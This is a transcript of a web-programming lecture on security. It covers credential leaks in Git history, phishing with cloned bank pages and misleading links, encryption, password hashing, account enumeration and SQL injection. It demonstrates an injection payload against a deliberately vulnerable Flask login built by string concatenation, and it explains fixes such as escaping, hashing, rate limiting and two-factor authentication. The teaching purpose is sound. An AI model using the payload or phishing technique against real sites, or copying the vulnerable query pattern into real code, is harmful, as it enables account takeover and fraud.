[MUSIC PLAYING]
BRIAN YU: Welcome back, everyone, to Web
Programming with Python and JavaScript,
and welcome to our final lecture.
So we've talked about a lot over
the course of web programming
with Python and JavaScript.
Everything from version
control to designing
what a web page looks
like using HTML and CSS,
and then moving into programming
languages like Python and JavaScript
that are used on the server side
and on the client side in order
to build and design web applications.
And where I thought
we'd conclude today is
by talking a little bit about
security, about making sure
that our web applications
are secure, thinking
about what sorts of
security vulnerabilities
can come about when we're
thinking about web applications
and deploying them to
the internet, and how
we can best defend against
those potential vulnerabilities.
And in doing so, we'll be taking
a look back at all of the topics
that we've talked about
so far in this course,
going from Git to HTML, to looking
at Flask, SQL, our API design,
thinking about programming in JavaScript
using Django as a library later on,
testing with continuous integration
and continuous deployment, in addition
to scalability.
And looking through all of
these past topics one at a time,
and thinking about where
security vulnerabilities might
arise in any of these potential
areas, and how we might start
to think about defending against them.
Some of these things will
be things we have alluded to
or talked about a little bit over
the course of the semester so far.
But today, we'll really
take an opportunity
to look at all of these
topics in a little more depth
and think about what security
vulnerabilities could come up
in the process of dealing with any
of these areas within a web program.
So where I thought we'd start is at the
very beginning by talking about Git.
So we began the semester by
talking about version control using
Git and GitHub, in particular,
as a way of hosting code
online in a place where different
people from around the world
can have shared access to a repository
of code where they can push code to it.
Or they can pull code from it using
different branches and features
like pull requests in order
to better collaborate on code.
And GitHub is really built upon
this idea of open-source software,
of software where the code
isn't hidden from people,
but is available for potentially anyone
who wants to to look at that code,
to see that code, and if they want to,
propose pull requests or suggestions
or changes to that code.
And so let's think about open-source
software just as a high level idea
right now.
What are some security benefits
of open-source software,
and what are some potential
security concerns that might arise?
Sure.
AUDIENCE: That lots of people
can see it on both sides.
BRIAN YU: Great.
Lots of people can see it--
AUDIENCE: But they'll fix bugs.
BRIAN YU: Right.
And that has implications
on both sides of things
when it comes to bugs, which means that
when you have a lot of different eyes
all looking at the same code, there's
a possibility that someone else might
catch a bug that you missed when
you were writing the software.
But on the flip side
of course, if someone
is able to spot a vulnerability
in your code by reading it
and they don't tell you about it or any
of the other maintainers of the code,
now they're potentially able
to take advantage of a security
exploit in your code, something
you didn't see coming before.
And something that they wouldn't
have otherwise known about
had the code not been open-source.
So open-source software
in that sense can sort of
be a double-edged sword where you have
to be careful that with a lot of people
all looking at the code, there's
potential both for a lot of people
to be able to help you in
finding bugs and making security
improvements to your
code, but also areas
where there might be vulnerabilities.
And over the course of
today, we'll be looking
at some of those potential
vulnerabilities that can exist inside
of our web programs and
taking a look at how we might
start to try to defend against them.
What other security
considerations might come up
when we're using Git and
GitHub, in particular?
If we're hosting our
code online, you might
think that with open-source
software, we might be able to just
make our repositories private.
So GitHub has the option of
making repositories private so
that only certain people have
access to your repository.
So not everyone can potentially see it.
But what dangers still
might arise there?
Multiple possibilities.
Sure?
AUDIENCE: Someone had access
to your GitHub account.
BRIAN YU: Sure.
If someone had access
to your GitHub account,
all your code is now stored online.
Which means if some
enterprising hacker is
able to somehow gain
access to your account,
then they might be able
to take advantage of that.
And so for a long time,
most websites have
operated under a model
of username and password
being the way that you
log in to a website.
And increasingly, there are
ways that hackers try and bypass
that, by trying to
either guess passwords,
by guessing frequently used
passwords, or by trying to just guess
many, many different
passwords, trying thousands
or millions of different
password combinations
in the hopes of at least getting
access to some person's account.
And so if hackers are doing that, trying
to guess at passwords very quickly
in order to try and gain
access to accounts, what can
web applications do in order
to defend against that?
In order to defend
against hackers that might
be trying to get into other
users' accounts unauthorized.
Sure?
AUDIENCE: They could do things
like only so many misses.
You can only have so many wrong or
perhaps another kind of authentication,
also.
BRIAN YU: Great.
So different possibilities exist.
One might be placing a
limit on the number of times
you can try to log in
in any period of time.
Maybe you can only log in, or
attempt to log in, five times,
and if you miss five
times, then you have
to wait potentially an hour until you're
able to log in again, for instance.
So many applications do that.
And then you also talked about
other authentication systems.
So what other authentication
systems could there be?
AUDIENCE: So like the the thing where
you get a code pushed to your phone
somehow.
BRIAN YU: Great.
So an increasingly popular
form of authentication
now is two-factor authentication.
The idea that it's not just enough to
log in with a username and password,
but you might also want to log
in with something else, something
that is physically on you,
like a phone for instance.
Where, after you type in
your username and password,
a code is texted to your phone,
or you use an app on your phone
in order to get a special code, and
then you have to type in that code.
So that even if an attacker
potentially knows your password,
either by hacking into some
database and finding the password
or just by guessing it
luckily, they're still
not going to be able to access
your account because they still
have this added step of having to go
through some two-factor authentication
code.
Where they now need to type
in a particular code that
is only available to someone
that physically owns the device,
like a phone.
And that can also help to
improve security as well.
And so GitHub, for instance, has
an opt-in two-factor authentication
where you can enable
that for your account
in order to make your
GitHub account more secure.
And other websites are increasingly
offering two-factor authentication
as well, as just an additional means
of trying to secure your accounts.
And web applications are beginning to
use that as a security measure as well.
But let's think more broadly, not just
about GitHub, but about Git in general,
and this idea of version
control and making changes
and committing and saving those changes.
And when we're thinking about
pushing our commits to the internet,
taking our changes that we've
made in a GitHub repository
and pushing them online,
we want to be careful
that sensitive information
like a password or an access
token for some service doesn't
end up inside of a repository.
Because if it does, then if it gets
pushed online regardless of whether
that repository is public or not, then
there's a potential that other people
might be able to see that access
token when they probably shouldn't.
And so imagine a situation where
you're working on a repository.
And you've made some commits
and maybe accidentally, you
put a password or some
access token that you
didn't mean to inside of one of the
files, and you commit that file.
And so credentials have now been
exposed in one of the commits inside
of your repository.
And then later on down the
line, you realize that mistake.
You realize, oh, wait a minute, I put
credentials inside that repository
when I probably shouldn't have.
And you make another commit removing
those credentials from the file.
So you add another commit,
removing those credentials.
And now those credentials are no
longer in the head of the repository.
You've taken them out, you've
committed that removal.
Is that secure?
No.
I see you shaking heads.
Why not?
AUDIENCE: Because you
can see all the history.
BRIAN YU: Great.
Because of Git's version control system,
the fact that it's saving every time
you make a commit, it's
saving your entire history.
Which means that even though--
if you look at all of your files
in their current state now--
those credentials are not there, anyone
who has access to that repository
has access to the full
history of commits.
They can go back and look at
your previous commit messages,
the previous files you've changed, and
what your files looked like every stage
along the way.
And so once you've exposed
those credentials, now
even if you make another
commit after that,
those credentials are
still going to be there.
And so there are ways around this.
There are ways of reverting back to a
previous commit and pruning away all
the extra commits, and then what we
would call force pushing those commits
back to GitHub in order to update it.
But generally, once you've
pushed code to GitHub,
you might want to imagine all of
that code as potentially compromised.
So if you had passwords
or security credentials
or other keys inside of your
repository that you accidentally
pushed to GitHub, probably a good idea
to just exchange those credentials
altogether in order to
get new ones because there
is the potential that those
credentials could be compromised once
they're pushed.
And so those are some
security considerations
that might come about when we're
thinking about Git and GitHub.
But let's take a look now to actually
writing code and taking a look at HTML.
So HTML, remember we were using in
the very beginning of this semester
and all throughout the semester
in order to design web pages
and were just consisting of tags where
we had our body tags and different tags
for creating lists or
creating forms or creating
buttons and so on and so forth.
What security vulnerabilities might
come about from just purely HTML?
Or how might HTML be used to
trick users into doing something
that a malicious attacker
might want them to do?
Yeah?
AUDIENCE: In browser, we can see
HTML by going to [INAUDIBLE]..
BRIAN YU: Great.
Inside of a browser, for instance,
you can inspect at a website,
and you can take a look
at all of the code.
And so what are the
implications of that?
Well, that means that if I wanted to, I
could, for instance, go into my browser
and go to, I don't know,
bankofamerica.com for instance.
And I could pull up, OK, here's
Bank of America's website, which
is really just HTML that's
been rendered onto my screen.
And if I wanted to know what code
is Bank of America using in order
to make any of this stuff
happen, I could reasonably
control click on the site,
click on View Page Source,
and what that pulls up for
me is a whole bunch of HTML.
It's a whole bunch of it, and I don't
really know what all of it does.
But if I just take it all
and copy it to my clipboard,
and I go into a text editor
and create a new file--
I'll call it bank.html--
and I'm just going to
paste in all of that code
that I just copied off
Bank of America's website.
I didn't have to write any of it,
just copied it straight from there.
Now if I go ahead and open
bank.html, this file I just created,
now I've effectively recreated
Bank of America's website
just by copying their HTML.
And if I now host this from my
own web server, for instance,
I might be able to trick unsuspecting
users into thinking that this
is actually Bank of America's website.
Because just at first glance, it looks
quite reasonably like the same thing
because it's the exact same HTML.
And if I'm really
enterprising, I can think
about actually trying to make
modifications to this code
in order to even better be able to
try and maliciously take advantage
of a user who might unsuspectingly
be arriving at this site,
not realizing that it's not the
actual Bank of America website.
I might, for instance, take
this Forgot Passcode button
down here-- which is
probably a link to some page
where they might type in their
email address or try and type
in some new passcode that
they want for instance--
and I might just take this
HTML file, and I'll just
search for forgot passcode.
And OK, here it is.
Here's forgot passcode.
And if we notice, it's located
inside of an a tag-- an anchor tag--
which has this href
attribute, which is going
to be where the user is linked
to if they were to ever click on
that I forgot my password button.
And so if I take this link, this
secure.bankofamerica.com/login
something, and instead of linking
to that, link to, I don't know,
htps cs50.github.io/web or whatever
other page I want to redirect the user
to.
Now if I refresh the site, it looks like
Bank of America's website once again,
but when they go over here and they
try and click on this Forgot Passcode
button, now they're taken to
our website or whatever website
I want to take the user to.
I can modify the HTML that they have
in order to direct them anywhere.
And so that's sort of
one of the common ways
that attackers are able to use
HTML to try and trick users
into doing something.
In particular, noting the
fact that you can take a link
and make it look like it's
going anywhere, but really
take the user to
somewhere that you want.
I can have something like this where
if I just have a href equals url1--
where url1 is where I want
the user to be taken to
and url2 is just the text
that appears to the user--
then the user might
reasonably be tricked
into thinking that they're going to url2
when in reality, they're going to url1.
And so a simple example of that
might be inside of link.html here.
We're in link.html.
It's a very simple HTML website,
where on inside of my body tag,
I have an anchor tag, which
is just going to be a link.
And the href of that link is this
course's website, for instance.
But in between the a tags, what I
have is just google.com, for instance.
And so what that means is that
if I were to open up link.html,
for instance, what the user
sees is something like this,
a page that just has a link to Google.
And they might reasonably think
that clicking on that link
should take them to Google when in
fact, when they click on that link,
they're taken here instead,
to the course web page.
And so you can imagine
how this might actually
be able to be used in order
to create potential exploits.
So that if someone were to
take Bank of America's URL,
and I go to link.html and say, all
right, we'll put Bank of America here,
and in the href, instead
put bank.html, for instance,
which is the link to the file that I
created copying Bank of America's code.
Now suddenly, when I
open up link.html, I
get a link that looks like it
is linking to Bank of America.
I click on that link,
and I get a page that
looks like Bank of America's website.
And if I click on forgot my passcode,
now I'm redirected to some other side
altogether.
And so these are common
ways that exploits
are able to happen by taking
advantage of security vulnerabilities
like this where we're really just
relying on people not being aware
of the fact that clicking
on a link might take them
to somewhere else different altogether.
And so how do you defend
against things like this?
Well, one good strategy
from the user end
is just to be careful about
the links that you're clicking.
In Chrome, for instance, if you hover
over a link, down in the lower left,
you can see this--
it's in small text, so you
might not be able to see it,
but this is the actual link that
this link is going to be going to.
So you can't always
trust what the text is.
You might want to look very carefully at
where that link is actually taking you.
And so these are just some examples
of HTML being used in order
to create potential security exploits.
Questions about any of that so far?
Yeah?
AUDIENCE: So why does our
browser allow us to see a source
code in the first place?
BRIAN YU: Great question.
Why do web browsers allow us to see
the source code in the first place?
Well, in a sense, the web browser,
what it's getting is the source code.
So when a web browser is making
a request to bankofamerica.com,
for instance, bankofamerica.com needs
to give back information to my computer.
And that information needs
to be the code, the HTML,
that is going to render the page.
So hypothetically, a browser might
be able to just not make it easily
accessible to get to that source code.
But anyone who wants to, if
you're really enterprising,
could just look at the information
that's coming back from the server.
That information will contain the
source code one way or another.
So there's really no way to hide it.
Good question, though.
All right.
So that was HTML being used in
order to create potential security
vulnerabilities or security exploits.
Let's take a look now, by moving on
one week, and talking about a Flask.
So we talked about moving on from
just creating static web pages that
are displaying HTML content to using the
web server, where we're communicating
between the server and the user,
sending packets of information
along the internet.
And as soon as we start dealing
with that, packets of information
going from one server to a
client, traveling between routers,
now we start to deal with other
security concerns as well.
So here, we'll start to talk about
HTTP, Hypertext Transfer Protocol, which
is typically used to send packets
of information across the internet,
as well as HTTPS, which is a more
secure version of that, which
we'll take a look at in just a moment.
So let's imagine this diagram.
I have one computer
here, maybe it's a server
running some Flask web application.
And I have a client over
here, which is maybe asking
for information from that web server.
In other words, I've
got two computers that
need to communicate with each
other over the internet somehow.
And maybe they've never
communicated with each other before,
so they need to talk
to each other somehow.
And so this computer might want
to send packets of information
to the other computer.
But of course, that information doesn't
go to the other computer directly.
It needs to travel over
the internet, traveling
between different routers and
different servers for instance,
before it gets from point
A to point B. And likewise,
when information wants to come
back from that computer over there
to this computer, we also
need to have information
that is traveling through the
internet that's potentially going
to all of these routers in between.
And so just looking at
this diagram, what's
a security vulnerability that seems
clear just from a basic perspective?
Yeah?
AUDIENCE: Changing HTTP header could--
BRIAN YU: Great.
So changing HTTP headers.
That's an interesting thought, that if
this request is getting passed from--
a request goes from this computer
through all these routers
into this computer, potentially,
one of the servers in the middle,
one of these routers, might be able
to change that request, for instance,
in order to try and make a request
that's slightly different than what
the original user wanted.
Or likewise, because any of
these intermediary routers
have access to the full contents
of whatever request is being passed
or response is being passed back and
forth between these two computers,
anyone in the middle of this process
could potentially take that information
and have access to it.
They could read an
email that's being sent
or the contents of a web page response
that's being sent from one computer
to the other because that
packet of information
is just traveling over the internet.
So how do we solve that problem?
Yeah?
AUDIENCE: Encrypt traffic.
BRIAN YU: Encrypt traffic.
Great.
Cryptography is this idea of encrypting
information, of making sure--
so that we can encrypt our
information so it's not
the plain text of the
request or the response
that's getting sent over the
internet, but rather some ciphertext,
some encrypted version of that plain
text, such that someone in the middle
can't just immediately read it.
And there are all sorts of
different cryptography algorithms.
And we'll talk high level about
a couple of the ideas that
go behind cryptography.
And so one form of cryptography
you might hear about
is secret key cryptography,
where the idea there
is that we have a secret key
that only I know and only
the person at the other computer that
I want to communicate with knows.
And that key can be used with
my cryptographic algorithm
to encrypt my plain text.
I take my plain text and use my secret
key to encrypt it into ciphertext.
Or likewise, I can use the
key to decrypt information.
If I have ciphertext, something
that's already been encrypted,
I can use that key along
with the ciphertext
in order to generate plain text.
And so you might imagine a diagram
where I have one computer over here
and I'm trying to communicate
with a computer down there.
I have this secret key, this ability
to encrypt and decrypt information,
and I also have the plain text
of what it is that I actually
want to encrypt, the message that I want
to send from one place to the other.
And so what might reasonably happen?
What I do in secret key
cryptography is first
use the key to encrypt
the plain text, generating
some ciphertext, some encrypted
version of the plain text
that someone without the key
wouldn't be able to understand.
So then I would need to transfer
the ciphertext to this computer.
And if this computer has both the
ciphertext and a copy of that same
secret key, then they can use that key
in order to decrypt that ciphertext
and regenerate the plain text-- find
out what it is that I actually intended
to happen--
such that now, the plain text was
never transferred from one computer
to the other.
I was only ever
transferring the ciphertext
from one computer to the other.
Does anyone see a problem
with what we just did there?
It seems like no plain
text is ever transferred.
What could go wrong?
Yeah?
AUDIENCE: How do you send the key?
BRIAN YU: Great.
How do you send the key?
That somehow, I need to have
this key and the person over here
also needs to have that key.
And if I'm just sending the key
over the internet from one computer
to the other, which
I would theoretically
need to do because otherwise
I have no way of communicating
with the other computer, then we've
just created the same problem again.
That any of these routers,
these intermediary pieces,
over the course of this communication
from computer A to computer B,
could just intercept the key
and intercept the ciphertext.
And now they have all the
pieces they need in order
to regenerate the plain text.
So this secret key
cryptography works if and only
if only I and only the other
person have access to the key.
And it doesn't work so well
if this key is something
that needs to be transferred
plainly over the network in order
to get to the other person, because then
anyone could just intercept that key.
And so how do we solve that problem?
Well, one solution
people have come up with
is this idea of public key cryptography.
And this is very common,
and it's what HTTPS
uses in order to securely transfer
information over the internet.
And the idea there is instead of
having just one key, we have two keys.
We have a public key and a private key.
And these are related in a
particularly important way,
and the details have to do
with a lot of mathematics.
But the general idea is that
the public key is something
that you should be able
to share with anyone,
and the public key can only be
used to encrypt information.
It will take plain
text and it'll generate
the ciphertext, the encrypted version.
But it doesn't go in
the other direction.
It can only be used to encrypt data.
And likewise, the
private key is something
that you should only
ever keep to yourself.
You should never share your
private key with anyone else.
And the private key can
be used to decrypt data.
That if I have encrypted
information that
was encrypted using the public
key, I can use the private key
in order to decrypt it.
So what does that model
look like if I now
have two computers that want
to communicate with each other?
I still have this
computer over here that
wants to send this plain
text over to this computer,
but wants to do so securely.
So the first thing that's
going to need to happen
is that this computer,
computer B down here,
gives its public key to
computer A. And that's
OK because the public key is something
that can be shared with anyone.
Anyone's allowed to see it
because the public key can only
be used to encrypt data.
It can't be used to decrypt data.
And so now computer A, having access
to the plain text and the public key,
now has the ability to encrypt the
plain text, generating the ciphertext.
That ciphertext then gets transferred
down to the other computer.
And now computer B has both the
ciphertext, this encrypted information
that nobody along this path
was able to read or see,
and also has access to this private
key that only they had access to.
And that is the only thing that can be
used in order to take the ciphertext
and decrypt it and figure out what
it is that the message actually is.
And now computer B has the ability
to regenerate the plain text from it.
And so now we've been able to come up
with a secure way of allowing computer
A and computer B to
communicate with each other,
just by allowing them to use this
public and private key pairing such
that the public key is used
to encrypt the information
and is shared with everyone,
and the private key is only
used for decrypting the information.
And it doesn't matter if
the intermediaries have
the public key because that
just means other people might
be able to encrypt the
data, but not necessarily be
able to decrypt that information.
Questions about that or any problems
that we see with that model?
OK.
In that case, we'll go
ahead and move on to talking
about our next subject, which is
going to be environment variables.
And so environment
variables are something
we've seen a little bit of in Flask
before, and probably in Django as well.
But we'll talk about it
in the context of trying
to make our applications more secure.
So we talked about,
in the context of Git
earlier, that we rarely,
or probably never,
want to put passwords or other
secure, confidential information
inside of our source code.
Because as soon as we push a password or
an access token to a GitHub repository,
now suddenly anyone who has
had access to that repository
could theoretically be able to see it.
Or if someone gets access to your
GitHub account by some means or another,
they would also be able to see
that password or access token.
Maybe that's going to be an access token
that is the access token for getting
access to your database, for instance.
Or it's your access
token for whatever cloud
provider you're using,
like Amazon Web Services,
in order to deploy your
application to the internet.
So rather than doing something
like this, where if you've used
Flask before and have used
their cookie-based sessions,
you need to set a secret key
inside of your application
where you might have
set a secret key to just
be some random string of characters,
which is totally fine from just running
the application.
This isn't all that
secure because as soon
as you push this file to
the internet, now anyone
who has access to your
repository theoretically
has access to your secret key as well.
And so these are often times where
we would want to use environment
variables, using variables that are
located just inside of the system
on the computer where your program
is running such that we can replace
the key with
os.environ.get("SECRET_KEY").
In other words, get the environment
variable called secret key
and use it as a secret key
so that inside your code, now
it just says this.
So nobody who reads your code knows what
the secret key for your application is,
but only the computer on which this
program is running that, theoretically,
has that secret key set as one
of its environment variables
will then be able to use it.
And so environment
variables in that sense
can be a very valuable
tool when it comes
to trying to make sure that
we're not exposing information
that we didn't want to expose when
we were creating our application.
Questions about environment variables?
All right.
So that was Flask.
And let's go ahead now and
move on to talking about SQL.
So we talked a lot
about databases and how
we might go about designing databases.
And in a couple of our
projects now, we've
had to create a table that is able
to manage a database of users, where
users are able to log in and log out.
And in order to do that, we needed some
sort of database structure in place
such that users were able to be
remembered by our system such
that they could log in such that
they had passwords and such.
And you might imagine that a users
table might have looked something
like this, where each user has
an ID, each user has a user name,
each user has a password.
What are potential design problems
of security vulnerabilities
with a table that's designed like this?
Yep?
AUDIENCE: If someone gets
their hands on the database,
they can see all the passwords.
BRIAN YU: Yeah.
So obviously, we want to
keep our tables secure.
We don't want to let just anyone
have access to our database.
But if by some chance, someone
got access to our database,
either because they managed to
figure out what the password is
or they got access to it
in some other way, now
suddenly they have access to all
of the different passwords that
are inside of this database.
They know what everyone's
password is, and now
that's a major security vulnerability.
Especially if some of these users
might be using these same passwords
not only on one website, but on
many other different websites.
Now their password could be compromised
across a number of different websites
as well.
And so what might be a solution here to
avoiding needing to store the password
inside of the table?
And this might be something
that you've already
done in some of your existing projects.
AUDIENCE: Encrypt the passwords.
BRIAN YU: Yeah.
Encrypt the password.
In other words, don't just store
the plain text of the password,
store some version of the password.
And in particular, we'll
generally store what we
call a hashed version of the password.
Where a hash function is just going to
be some function inside of your code
that takes text like a
password and generates,
deterministically, some long sequence of
characters that's seemingly random that
is associated with that text.
And so every time you put hello
in as the password and hash it,
you'll always deterministically
get the same output.
And so then your users table
might look something like this.
Where you've got all of your
users, but in your password column,
instead of storing the actual
password in plain text,
you're storing some hashed
version of that password.
Such that hello generates
this text as the password
instead of just storing hello.
So now if someone gets
access to this database,
they're still not going to be able
to log into Anushree's account,
for instance, if they go to
the website because they're not
going to know what password corresponded
with this long sequence of characters.
And generally, hash functions are
designed to be one-way functions.
That you can go from the plain text,
the password, to this hashed version.
But it's very, very computationally
difficult to go backwards,
to go from this hashed version
to what the password originally
was in order to generate this.
And so what are the security
implications of this model?
How do we now log in a user, now?
In this model.
If someone were to log
into a website, what logic
would need to happen if
we're no longer storing
passwords but storing hashed passwords?
Yeah?
AUDIENCE: They could
take the password they
enter, you run through
your hash algorithm,
and you see if it matches
what's in your file.
BRIAN YU: Wonderful.
User logs in with their
user and password.
You take that password and
you hash it, and you check
to make sure that the hash matches up.
And because our hash
function is deterministic,
the same input will output the
same output every, single time.
If they did input the correct
password, then the hashes
should theoretically line up.
Have you ever used a
website before where,
when you forget a
password, your password,
and you might want the
website to just tell you
what your password is, but
the website says, sorry,
we can't tell you what your password is,
but we can let you reset your password.
With this in mind, why
might that be the case?
Why can a website sometimes
not tell you what your password
is but still allow you to reset it?
Or still be able to log you
in if you knew your password?
AUDIENCE: Because they're not
storing it in text anymore.
So we don't know--
BRIAN YU: Great, exactly.
It's because of this idea of
the one-way hash function.
That if you take the password, you
can generate this hashed version.
But it's very difficult to
go the other way around.
Such that, if this is what I have access
to in my database, I can look at this,
and I don't actually know what
Anushree's or Elle's password
originally was.
But if you give me their password, then
I can hash it and compare it for you
and maybe be able to tell
you that as a result.
But I could reset it if I
wanted to just by replacing
this field with some new hashed value.
That would be something that
I could do, but I might not
be able to actually tell
you what that password is.
Of course, if these passwords
are common, like these are--
if they're just passwords
hello or password or 12345--
then how might I still be able
to figure out a user's password
even if the database looks like this?
Yeah?
AUDIENCE: You hash it and
compare the hashes or if you
can look for common hashes and see.
BRIAN YU: Exactly.
If you know what the hash function
is, then someone trying to--
a malicious user trying
to exploit the system
might be able to just try a whole
bunch of different common passwords,
figure out what their
hashed versions are,
and then compare it to the versions
that are here in order to figure out
what the password might be.
So even this is not a 100% foolproof.
Someone who is trying a
bunch of common passwords
might still be able to
figure out what it is
that's going on inside of this system.
And so that's certainly
one vulnerability
that could come up when we
think about database design.
But another vulnerability,
and this is one
we talked about a little
bit a couple of weeks ago,
but we'll dive into in a
little more depth now--
well, actually, first,
before we get there, sorry.
So this was that Forgot
Your Password screen
that we were talking a little
bit about before, where
oftentimes what might happen is you'll
type in an email address, for instance,
and you'll click Reset Your Password.
And that will send you
an email that gives you
the ability to reset your password.
So another possible way the
databases could be insecure,
we might have vulnerabilities inside
of the security of our database,
is thinking about what information
might be leaked by our database.
What information can get out
when we don't want it to get out?
And can anyone see a
potential vulnerability here,
in terms of information leakage?
Information that might be exposed
that we might otherwise not want
exposed, just from a user interface
like this that people can use?
AUDIENCE: Your email address might be
exposed as it's going over the web.
BRIAN YU: Great.
So your email address
is potentially exposed
as it's traveling from
one point to another.
Although, with HTTPS and trying
to encrypt that information,
usually we can help to
defend against that.
But certainly the idea of
typing in an email address
and clicking on reset password leads
to potential information leakage
in other potential ways.
Whereby if I type in an
email address of my account
that I've perhaps
forgotten my password to,
or a friend's account that I think
they've forgotten their password to,
potentially, and I click
Reset Password, then
I might see a notification that
very recently might just say,
password reset email sent.
What if I typed in the
email address of someone who
didn't have an account on the website?
What might you expect
this website to do?
Yeah?
AUDIENCE: Give you an error message.
BRIAN YU: Should give you
an error of some sort.
Something like, error, there is no
such user with that email address.
And now that we've seen those two
screens, you type in an email address
and sometimes you get password reset
email sent and sometimes you get error,
there is no user with
that email address.
Where is the potential
information leakage here?
Yeah?
AUDIENCE: It could figure
out who the users are
by trying out different emails.
BRIAN YU: Great.
Now, by using this screen, even if
I don't know people's passwords,
I can figure out who has an account with
this website and who doesn't, right?
If it's a bank, for instance, and
I type in someone's email address
and I get this screen,
password reset email sent,
now I know that this particular
user has an account with this bank.
And that might not be something that
your application wants to expose.
And so as you go about
designing web applications,
you always want to be
bearing these things in mind.
Thinking about what information
from the database is being exposed
and how might information that
I don't want to be exposed,
might be exposed to
users that I don't want
to have access to that information.
And certainly this is
one potential example
that maybe you don't really
care if your users are
able to know if other people have
accounts on the website or not.
But maybe in a place where it's
more sensitive or more secure about
whether or not a user has an
account on the website or not,
this might be something
you do care about.
And you'd want to think
carefully about how
you design the user interface,
about how users are interacting
with the database, and
whether or not you're
ever exposing information
that you don't want
to ultimately be exposed to the user.
Questions about any of that?
OK.
So now moving onto the topic
about SQL and vulnerabilities
that we did talk about a couple weeks
ago, and namely that was SQL injection.
And does anyone recall what SQL
injection is and why it's a problem?
Yeah?
AUDIENCE: So in a SQL web
class, we added or condition.
BRIAN YU: Great.
We were able to add an or
condition, or more generally,
just some sort of SQL code
into input for instance,
and get our own SQL code to
run on someone else's server.
So we were able to effectively do
whatever we wanted with the database
because we could run arbitrary
SQL queries on that database.
And so the example we
looked at, which we'll
look at an actual Flask
example of that today,
is a user name and
password field where we
might use that information
on the back end
to run a SQL query that
looks something like this.
Select star from users
where user name equals
whatever the user name was and password
equals whatever the password was.
And we imagine that if a user logs in,
like Alice with the password hello,
then we'd end up running a query
that looks something like this,
substituting in Alice as the
username, hello as the password,
and now we're selecting from all the
users where Alice is the username
and hello is the password.
And if there is a matching one, then
this will return a row, and otherwise,
it won't.
And of course, in this
case, the password
is not hashed, though
in a more secure system,
we might want to hash that password
first and then run this query.
But what might go wrong here?
So we talked about what would happen if
someone types in Alice as the user name
and something like this as the
password, 1'OR'1'='1, which seems sort
of complicated, but the result of that
was that when we plugged everything
in, now we're selecting from users where
the user name is Alice and the password
is 1-- which it isn't--
or the string 1 equals the string 1.
Well, this is, of course, true, and
now we're going to get some row back.
And so how might that
actually work in practice?
Let's take a look at a web application
that implements this very idea of just
a very simple login system
where an exploit like this
can help anyone get access
to any other user account.
So let's take a look at
injection and application.py.
So this is just a Flask
application, and our default route,
this index route, first checks if there
is a username inside of the session.
If there is a user name in
the session, in other words,
if someone is logged into
this current session,
we'll go ahead and render a
user.html page that will just display
who's currently logged in for instance.
Otherwise, if there
is no user, then we're
going to go ahead and render a
login.html page that would give people
the option to log into this website.
And now, let's take a look at what's
happening inside of the login function.
So first thing we're doing is someone
logs in by submitting a post request
to /login.
Then we get the user name by going
request.form.get("username").
We get the password by
request.form.get("password"),
just extracting that
information from the form.
We're going to print
out what the query is.
You'll see an example
of that in a moment,
but this isn't strictly necessary.
The interesting thing
is here, on line 33.
We're running db.execute, running
a database query, and saying,
select star from users
where username equals
and then plugging in the
username here, and password
equals, plugging in the
password there, and then
just getting the first row
that comes back from that.
And if a row does come back from
that, if the query was successful,
then and we log the user in by
storing them inside the session
and redirecting them
back to the index page.
In other words, we render the login
page again, saying invalid=True,
meaning there was some
authentication problem.
So that's all fairly straightforward.
And of course, the key
vulnerability to look at here
is the fact that whatever the
username and whatever the password is,
we just plugged them
straight into the SQL query
by just using string concatenation
in Python to join this all together.
So now if I were to run this Flask
application and take this URL
and go to that URL, I'm
faced with this login form.
And I can type in Alice--
and normally you would
want your password field
to use dots by setting the input type
to be passwords so nobody can see it,
but for the sake of example,
so you can see what I'm doing,
I've changed the password field
to just be a text field so you can
see what password is being typed in.
But of course, you would never
actually want to do that in practice.
But if I type hello as the
password, which is Alice's password,
and click Submit, now
I'm logged in as Alice.
It says, Welcome, alice.
And you can check by looking at the log.
Here's what got printed out.
Here was the query that ran.
Select star from users, where username
equals Alice and password equals hello,
and of course, that returned
back Alice as my one row,
and so that was all good.
I'll log out now.
If I try logging in with Alice
with a fake password, goodbye,
which is not the correct
password, and Submit,
I get Error, invalid credentials.
Why is that?
Well, here is the query that ran.
Select star from users, where user name
is Alice and password equals goodbye.
Well, that's not going
to return any results.
But of course, the injection attack
happens if I type user name Alice,
or user name, any user name that I
want, and type in 1'OR'1'=1, like that,
where now if I submit that, no matter
who the user is, now I see, Welcome,
alice.
I've logged into this user's
account, and why did that happen?
Well, here's the query that was run.
Select star from users where username
equals Alice and password equals 1 or 1
equals 1.
So by injecting arbitrary
SQL logic into this code,
I was able to gain access to any
user account that I wanted to.
And that's why it's very
important, when we're
using SQL and running SQL queries, that
we're careful to avoid SQL injection.
That any time user input
is being put into a query,
we want to escape any
potential characters that
might be part of a SQL
query in order to make sure
that nobody can just
run whatever SQL queries
they want to inside of our code.
And SQLAlchemy, which you may
have been using in Python in order
to do some of this stuff,
automatically takes
care of doing some of
that escaping for you,
if you're passing in the
parameters in a Python dictionary
for instance, which you
might have done before.
And so that's certainly
something you can use as well.
Questions about SQL vulnerabilities?
Whether it was reasons why we might
want to use hashed passwords inside
of our database or how we might
accidentally leak information,
as via that forgot your
password page, or as
to how we might have gone
about using SQL injection
to gain access to unauthorized data.
OK.
Next up, before we take
our break, was about APIs.
So we were thinking about Application
Programming Interfaces, the idea
that people could write APIs
for their web applications
that let people programmatically gain
access to information about whatever it
is that your website is designed to do.
So in the case of book
reviews, maybe you
had an API route that returned
the reviews for a particular book.
But you might imagine that
other sites might give you
API routes that do other things.
We didn't do this for
project three, but you
might imagine that in a restaurant,
for instance, that had a website,
you might have an API route that gives
you back your orders, for instance.
What security considerations
should go into designing APIs?
Or what could potentially go wrong?
Broad questions, so lots
of possibilities here.
AUDIENCE: You can expose stuff
that shouldn't be exposed.
BRIAN YU: You can expose stuff
that shouldn't be exposed.
So that's an interesting
idea, that if I, for instance,
had an API for being able to look at
my Amazon orders or look at the food
that I've ordered from a
restaurant in particular,
I would want that to somehow
only be accessible to me
and not accessible to someone else.
And so how would we implement
this idea of some people
should be able to access
certain information by the API,
and other people should not be
able to access that information
and should only be able to access
some other pieces of information?
AUDIENCE: Authentication.
BRIAN YU: Authentication, great.
We can use what are commonly
known as API keys, which are just
strings of text that are
associated with a particular user,
effectively like a
password, but for APIs.
Such that in order to
make an API request,
you not only need to
submit your request,
but you also need to
submit your API key.
And then it's on the web application
to check that key, to say,
does this key have permission to look at
the things that it's trying to look at?
And this is the idea of
route authentication,
that if someone makes an API
request to a particular route,
you better first make sure that whoever
is making that request has permission
to see whatever they're asking to see
before you actually show it to them.
And so API keys can be
used for that as well.
